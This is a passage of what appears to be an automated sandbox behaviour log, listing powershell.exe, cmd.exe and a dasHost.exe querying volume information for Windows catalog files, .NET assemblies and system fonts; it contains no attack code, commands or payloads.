                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
